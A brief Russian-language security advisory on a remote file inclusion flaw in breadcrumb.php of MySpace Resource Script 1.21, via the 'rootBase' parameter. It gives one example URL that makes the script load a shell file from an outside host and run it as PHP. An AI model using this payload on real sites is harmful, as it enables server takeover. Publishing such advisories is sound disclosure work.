Программа: MySpace Resource Script (MSRS) 1.21

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «rootBase» сценарием breadcrumb.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?



Оставить мнение